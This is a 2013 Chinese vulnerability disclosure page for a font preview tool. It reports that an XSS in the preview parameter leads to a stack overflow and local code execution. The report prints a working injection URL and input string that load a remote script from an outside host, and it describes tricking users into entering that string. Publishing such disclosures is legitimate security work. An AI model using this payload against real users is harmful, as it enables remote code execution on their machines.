漏洞概要
关注数(24)
关注此漏洞
漏洞标题:字体管家软件内XSS构造恶意连接将永久性造成本地任意代码执行
提交时间:2013-06-10 10:52
修复时间:2013-09-08 10:52
公开时间:2013-09-08 10:52
漏洞类型:远程代码执行
危害等级:高
自评Rank:10
漏洞状态:未联系到厂商或者厂商积极忽略
Tags标签:
无
漏洞详情
披露状态:
2013-06-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-09-08: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
晚上设计一个小网站的时候用字体管家在线预览字体,手贱测试了一下。构造XSS中的脚本构造恶意下载连接即可永久性造成本地任意代码执行(Win7)
详细说明:
字体管家是一个字体预览工具,官方网站http://font.xiaa.net,苦逼的前端设计人员可能会用到这玩意儿,字体管家的字体预览处有XSS漏洞,具体为:
http://font.xiaa.net/exe/look.php?str=aaa&size=20&lang=cn
str处可以构造XSS。网页过滤了"、',但是方法不正确,网页把"换为了\",这导致代码还是能直接闭合标签。而且脚本处仍然有很多方法绕过,这个很简单了。
然后,以下是它的下载脚本,这个脚本由网页调用,然后程序接受事件来处理
调用类似于:
<input type='button' value=' 安 装 ' onclick="font_down('长城新魏碑体','http://font.xiaa.net/zip/cn/1.zip',1,this);" />
构造:
http://font.xiaa.net/exe/look.php?str="><script src=http://lno.pw/test_4141.js></script>&size=20&lang=cn
进入字体预览-网站在线字库,诱导用户输入查询字符:
"><script src=http://lno.pw/test_4141.js></script>
输入完的同时脚本加载,调用程序的下载模块,由于字符过长发生栈溢出
漏洞证明:
test_4141.js
test.js
修复方案:
漏洞回应
漏洞评价:
评论
-
2013-06-10 11:27 |
blast ( 普通白帽子 | Rank:348 漏洞数:57 | 五仁委员会)
文章忘了写了……“永久”是因为他那玩意会缓存访问的网址,所以第一次触发以后再打开,程序就会自动访问那个XSS,然后脚本一执行,程序就又溢出了……Win7下是这样的,XP下面出不来,估计跟版本有关系
-
2013-09-08 11:09 |
Mapconf ( 实习白帽子 | Rank:31 漏洞数:5 | 专注g0v30年)